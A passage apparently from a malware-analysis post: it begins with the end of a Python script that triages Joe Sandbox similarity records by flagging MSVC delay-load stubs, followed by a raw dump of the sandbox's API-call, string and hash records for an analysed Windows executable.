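• Instruction Fuzzy Hash: 84B012B12DC1026D3144D1462D42F77410DC4C8B24730D01FF440C1181E9CC1CDA443F
"""

# 'Name.MODULE(args) ref: addr', optionally prefixed by the 'Part of subcall function' annotation.
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-F]+: )?([^\s(.]+)\.([A-Z0-9]+)(?:\(([^)]*)\))?")
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")   # '• Key: value' lines of the other sections


def parse_records(text):
    """Split the page text into records; a record starts at each 'APIs' header."""
    records, current, section = [], None, None
    for line in filter(None, map(str.strip, text.splitlines())):
        if not line.startswith("•"):                 # section header line
            section = line
            if section == "APIs":
                current = {"apis": [], "fields": {}}
                records.append(current)
            continue
        if current is None:                          # bullets before the first record
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m.group(3).split(",") if m.group(3) else []
                current["apis"].append((m.group(1), m.group(2), args))
        else:
            m = FIELD_RE.match(line)
            if m:
                current["fields"][m.group(1)] = m.group(2)
    return records


def decode_vcpp_exception(code):
    """Unpack a status the way VcppException(sev, err) packs it: sev | facility << 16 | err."""
    return {"severity": code >> 30, "facility": (code >> 16) & 0x0FFF, "error": code & 0xFFFF}


def is_delay_load_stub(record):
    """Heuristic: only delay-load helper APIs, and the raised status is the CRT's invalid-parameter one."""
    names = {name for name, _, _ in record["apis"]}
    if not names or not names <= DELAY_LOAD_APIS:
        return False
    for name, _, args in record["apis"]:
        if name == "RaiseException" and args:
            status = decode_vcpp_exception(int(args[0], 16))
            if status["facility"] == FACILITY_VISUALCPP and status["error"] == ERROR_INVALID_PARAMETER:
                return True
    return False


def group_by_instruction_id(records):
    """Map Instruction ID -> Opcode IDs, so the same stub at different addresses collapses to one entry."""
    groups = defaultdict(list)
    for r in records:
        groups[r["fields"].get("Instruction ID")].append(r["fields"].get("Opcode ID"))
    return dict(groups)


def triage(text):
    records = parse_records(text)
    stubs = sum(1 for r in records if is_delay_load_stub(r))
    return {"records": len(records), "delay_load_stubs": stubs, "groups": group_by_instruction_id(records)}


if __name__ == "__main__":
    result = triage(SAMPLE)
    print(f"{result['delay_load_stubs']} of {result['records']} records are MSVC delay-load stubs; "
          f"{len(result['groups'])} distinct Instruction ID(s)")
```

Run against the whole similarity section of a report, the grouping step is what makes the output readable: each distinct Instruction ID is one piece of code worth a look, and records flagged as delay-load stubs can be dropped before reading the rest for the sample's own behaviour.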
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 2cc8592bccbd31ca00c2baf4c773ab292c7381f1461a8de681e32c4fe32790f4
                                                                                      • Instruction ID: 5d34c4ef73159b48ef98f756ed2452bcc606b79b358a88c4f8171acb0e1c4188
                                                                                      • Opcode Fuzzy Hash: 2cc8592bccbd31ca00c2baf4c773ab292c7381f1461a8de681e32c4fe32790f4
                                                                                      • Instruction Fuzzy Hash: 57A012B11DC1037C300491412C42F77010CC4C4B64330440FF4018008168C808C1403D
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 72ba3987d0c8a08886187db4b8e1a16d52aae4f82fc9d6be2ad8ef8a5d1211ea
                                                                                      • Instruction ID: 5d34c4ef73159b48ef98f756ed2452bcc606b79b358a88c4f8171acb0e1c4188
                                                                                      • Opcode Fuzzy Hash: 72ba3987d0c8a08886187db4b8e1a16d52aae4f82fc9d6be2ad8ef8a5d1211ea
                                                                                      • Instruction Fuzzy Hash: 57A012B11DC1037C300491412C42F77010CC4C4B64330440FF4018008168C808C1403D
                                                                                      APIs
                                                                                      • SetEndOfFile.KERNELBASE(?,00408EDB,?,?,-00001954), ref: 00409B6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File
                                                                                      • String ID:
                                                                                      • API String ID: 749574446-0
                                                                                      • Opcode ID: 9864bcb57162c85110c8faf64388ce5de8609e1676df7f9d29deef0ffaf89557
                                                                                      • Instruction ID: 6a0992ea27ef0c87fb6a312554a6ad9490973bdd4a744099f39c10c8d9797478
                                                                                      • Opcode Fuzzy Hash: 9864bcb57162c85110c8faf64388ce5de8609e1676df7f9d29deef0ffaf89557
                                                                                      • Instruction Fuzzy Hash: F1B011300E000A8A8F002B30EC088203A20EA2230A320A2B0A00AC80A2CB22C002AA08
                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,0041927A,00442120,00000000,00443122,00000006), ref: 00419027
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 1611563598-0
                                                                                      • Opcode ID: 4c3e9bb71c09b3981f1d50df5ccd69e8e2446fcc624f80265e99df0bb3e8ed9e
                                                                                      • Instruction ID: 0f491f621cda5b4557bb03b4954193c739ec83fd21feae94fc1f50dd17cedc17
                                                                                      • Opcode Fuzzy Hash: 4c3e9bb71c09b3981f1d50df5ccd69e8e2446fcc624f80265e99df0bb3e8ed9e
                                                                                      • Instruction Fuzzy Hash: 9CA0123019410647CE000B30CC09C1976505760702F0097307042C00A0CB318810E504
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(000000FF,?,?,00409473), ref: 004094BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 1197ff7dda9cbae130511b5618cf034556a88c9dc972b412d9298cd87bdfe929
                                                                                      • Instruction ID: 856e66f56f0b28dfa5396a68c02fa705947e0e3e0a6fb33033b04355c19c5cbb
                                                                                      • Opcode Fuzzy Hash: 1197ff7dda9cbae130511b5618cf034556a88c9dc972b412d9298cd87bdfe929
                                                                                      • Instruction Fuzzy Hash: 0BF0B47055AB044EDB308A24A548792B3E85B11725F04873FD0E6539D1D379684A8B14
                                                                                      APIs
                                                                                        • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                        • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0041A5C8
                                                                                      • EndDialog.USER32(?,00000006), ref: 0041A5DB
                                                                                      • GetDlgItem.USER32(?,0000006C), ref: 0041A5F7
                                                                                      • SetFocus.USER32(00000000), ref: 0041A5FE
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 0041A63E
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0041A671
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0041A687
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0041A6A5
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041A6B5
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0041A6D2
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0041A6F0
                                                                                        • Part of subcall function 0040D142: LoadStringW.USER32(?,?,00000200,?), ref: 0040D187
                                                                                        • Part of subcall function 0040D142: LoadStringW.USER32(?,?,00000200,?), ref: 0040D19D
                                                                                      • _swprintf.LIBCMT ref: 0041A720
                                                                                        • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
                                                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0041A733
                                                                                      • FindClose.KERNEL32(00000000), ref: 0041A736
                                                                                      • _swprintf.LIBCMT ref: 0041A791
                                                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 0041A7A4
                                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0041A7BA
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0041A7DA
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041A7EA
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0041A804
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0041A81C
                                                                                      • _swprintf.LIBCMT ref: 0041A84D
                                                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0041A860
                                                                                      • _swprintf.LIBCMT ref: 0041A8B0
                                                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 0041A8C3
                                                                                        • Part of subcall function 0041932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00419355
                                                                                        • Part of subcall function 0041932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0043A154,?,?), ref: 004193A4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                      • API String ID: 3227067027-1840816070
                                                                                      • Opcode ID: 0efcb88c166d1052a20f1420ccdecff87bb937dc9efe3444558e107c45fb997f
                                                                                      • Instruction ID: d4bb10729dede2a45d4cd598446a7db89e0d72efb69f85dfdb0c70292ec08b94
                                                                                      • Opcode Fuzzy Hash: 0efcb88c166d1052a20f1420ccdecff87bb937dc9efe3444558e107c45fb997f
                                                                                      • Instruction Fuzzy Hash: 6591B672548308BBE231EBA0CC49FFB77ADEB49704F04482AF645D6180D775AA49876B
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00407075
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 004071D5
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004071E5
                                                                                        • Part of subcall function 00407A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00407AAC
                                                                                        • Part of subcall function 00407A9D: GetLastError.KERNEL32 ref: 00407AF2
                                                                                        • Part of subcall function 00407A9D: CloseHandle.KERNEL32(?), ref: 00407B01
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 004071F0
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 004072FE
                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0040732A
                                                                                      • CloseHandle.KERNEL32(?), ref: 0040733C
                                                                                      • GetLastError.KERNEL32(00000015,00000000,?), ref: 0040734C
                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00407398
                                                                                      • DeleteFileW.KERNEL32(?), ref: 004073C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                      • API String ID: 3935142422-3508440684
                                                                                      • Opcode ID: a651dce6c16ec147ca00bb0e9ff455fb4e49c78d447f009a24f5e2618a7e0e46
                                                                                      • Instruction ID: 93471cfaedec1773bf66c9a54fbdc0c9308a64d9f63adc279eff9196ac87510e
                                                                                      • Opcode Fuzzy Hash: a651dce6c16ec147ca00bb0e9ff455fb4e49c78d447f009a24f5e2618a7e0e46
                                                                                      • Instruction Fuzzy Hash: AFB1C171D04218ABEB24DF64DC45BEE77B8AF08304F10457EF919E7282D738AA45CB69
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memcmp
                                                                                      • String ID: CMT$h%u$hc%u
                                                                                      • API String ID: 3004599000-3282847064
                                                                                      • Opcode ID: ddf166f6b4bf2136a764b7f765d8ae9cf4a9bab3a460d7555e27824cf04812cd
                                                                                      • Instruction ID: c82075d55fccedc8009f26eee82ea6cb4e387a31c93fd15d465978f9233536a4
                                                                                      • Opcode Fuzzy Hash: ddf166f6b4bf2136a764b7f765d8ae9cf4a9bab3a460d7555e27824cf04812cd
                                                                                      • Instruction Fuzzy Hash: EC32C2715102849FDF14DF75C886AEA3BA9AF14304F04457FFD4AAB2C2DB789A48CB64
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 4168288129-2761157908
                                                                                      • Opcode ID: e10739117bab0f38ee393d5afb1d0af2d58d12564532ac9724e0abf39dbc9394
                                                                                      • Instruction ID: e50cca27e08be5cc45ff889d3a3dfaedd8d078c35bd69298574475a60c4b375a
                                                                                      • Opcode Fuzzy Hash: e10739117bab0f38ee393d5afb1d0af2d58d12564532ac9724e0abf39dbc9394
                                                                                      • Instruction Fuzzy Hash: 9EC26A71E046288FDB25CE28ED407EAB3B5EB84305F5541EBD80DE7240E778AE918F85
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00402775
                                                                                      • _strlen.LIBCMT ref: 00402CFF
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00402E56
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3741668355-2756464174
                                                                                      • Opcode ID: 3fcc10ef119ae08286ff6896c19eecf55bb7bbbc4ae4efd4232360e4defe4414
                                                                                      • Instruction ID: 2799a550df5717b1489d928a2b28ed197d0f113527a5322214b2ad65d00cc043
                                                                                      • Opcode Fuzzy Hash: 3fcc10ef119ae08286ff6896c19eecf55bb7bbbc4ae4efd4232360e4defe4414
                                                                                      • Instruction Fuzzy Hash: 0062D4719002448FDB18DF75C9896EA3BE5AF58304F04457FEC8AAB3C2DBB89949CB54
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00425C4B
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00425C55
                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00425C62
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 5b402a4088d21ae412fc8a3c7cf1340c840b177189ee0bac6582440d6838c64d
                                                                                      • Instruction ID: 8bc7ff493eb23c624a4d8d51066ab69365286bb0d14cbcbf8dd5e92118e627f6
                                                                                      • Opcode Fuzzy Hash: 5b402a4088d21ae412fc8a3c7cf1340c840b177189ee0bac6582440d6838c64d
                                                                                      • Instruction Fuzzy Hash: 1D31B3B5D013289BCB21DF69D9897DDBBB8BF18310F5042EAE41CA7250E7749B818F48
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                      • Instruction ID: d13349a72730bd24d82249ac632ad852ccb65984af13935171e2255f4327feb5
                                                                                      • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                      • Instruction Fuzzy Hash: B2027C71E002299FDF14CFA9D8806AEF7F1EF48324F65816AD815E7380D735AD118B95
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00419355
                                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,0043A154,?,?), ref: 004193A4
                                                                                      Similarity
                                                                                      • API ID: FormatInfoLocaleNumber
                                                                                      • String ID:
                                                                                      • API String ID: 2169056816-0
                                                                                      • Opcode ID: 136972e29aded3648d79152abaf2305009f544dbc4374374e7a236e0ba091e0d
                                                                                      • Instruction ID: 10841ce58ae48a899f18d83561abf6ffac88627ed528167507aae241650d83f0
                                                                                      • Opcode Fuzzy Hash: 136972e29aded3648d79152abaf2305009f544dbc4374374e7a236e0ba091e0d
                                                                                      • Instruction Fuzzy Hash: 44019E75140308ABDB108FA0DC05FAB77BCEF09710F005436BA04E71A1D7749925CBAA
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0042E8CF,?,?,00000008,?,?,0042E56F,00000000), ref: 0042EB01
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 2efdb38d6f8dae49581ad2e934fb938510242d5284ba94e25f7ed2d6d05831aa
                                                                                      • Instruction ID: 2239f2d6d8d6fb9b18873fdbe64a9e7f3f1e4093cd7c72b91be474660127ec6f
                                                                                      • Opcode Fuzzy Hash: 2efdb38d6f8dae49581ad2e934fb938510242d5284ba94e25f7ed2d6d05831aa
                                                                                      • Instruction Fuzzy Hash: 51B16B31210618CFDB15CF29D48AB657BE0FF45364F65865AE89ACF3A1C339E982CB44
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: gj
                                                                                      • API String ID: 0-4203073231
                                                                                      • Opcode ID: 3b690d12a1b2516ae3765c73cd49df4d9623ea89e038fc541eed540fa6846895
                                                                                      • Instruction ID: 86f79434ad5e4c1c9555b7c6a3bff1f8ec43d53b3cfdd72053e665a554099537
                                                                                      • Opcode Fuzzy Hash: 3b690d12a1b2516ae3765c73cd49df4d9623ea89e038fc541eed540fa6846895
                                                                                      • Instruction Fuzzy Hash: ABF1F4B2A083418FD348CF29D890A1AFBE1BFC8208F14992EF998D7711D734E9558F56
                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 0040A905
                                                                                      Similarity
                                                                                      • API ID: Version
                                                                                      • String ID:
                                                                                      • API String ID: 1889659487-0
                                                                                      • Opcode ID: 77cc60c088a479c98dfbe18cd1b8abb71eb473ed596bd7940bfc1839bb767939
                                                                                      • Instruction ID: 01d4f18c07da7b2f11fceccc9854386fe72919e36506f7316c5522edeb569e07
                                                                                      • Opcode Fuzzy Hash: 77cc60c088a479c98dfbe18cd1b8abb71eb473ed596bd7940bfc1839bb767939
                                                                                      • Instruction Fuzzy Hash: 07F030B5A003088BCB28CF18EC82AE5B3B5F759314F2156B5D91573390D374AD918F5A
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,0041D604), ref: 0041DBC8
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: b851c5a598c5e23e710a7c13772d0a048c494ea2914c69954882ca90c40e31f1
                                                                                      • Instruction ID: 4f53188556a6ef6076aad6d5fe0bb1f10976768f428eb50103e3d295b806f1de
                                                                                      • Opcode Fuzzy Hash: b851c5a598c5e23e710a7c13772d0a048c494ea2914c69954882ca90c40e31f1
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8C
                                                                                      • API String ID: 0-2849189062
                                                                                      • Opcode ID: 7208dce39fa71b10af863625e025e815fcd21d6305fd714ff63af232737f43f9
                                                                                      • Instruction ID: 131fdb21aeda73f922136a5ffddf3fc278d735410ec39c66c72ae7b6cb3c8856
                                                                                      • Opcode Fuzzy Hash: 7208dce39fa71b10af863625e025e815fcd21d6305fd714ff63af232737f43f9
                                                                                      • Instruction Fuzzy Hash: FF51233190C3954ED712CF2AC1800AEBFE0AFDA314F4958AEE4D55B292C138D68DCB5A
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 4d8b9e40af4376da57ddcbb23a450cf436684ee3703a4a5c80d5b98a27cc9c7c
                                                                                      • Instruction ID: 6f8d721a7f26fd8cb4698955ac085fd7a4f9aa386fb5cde1c1e6eda3a928e7fb
                                                                                      • Opcode Fuzzy Hash: 4d8b9e40af4376da57ddcbb23a450cf436684ee3703a4a5c80d5b98a27cc9c7c
                                                                                      • Instruction Fuzzy Hash: A2A02230202300CFAB208F32AF0A30C3AE8FB023C2300A03CA808C2230EB30C0008B08
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                      • Instruction ID: e12e830cb657b9cb1f48023ef0410134c24d57a5825d0efe0722172b3e54ff22
                                                                                      • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                      • Instruction Fuzzy Hash: A3621B71604B84DFCB25CF38C5906FABBE1AF95304F04855FD8AA8B346D738A985CB19
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
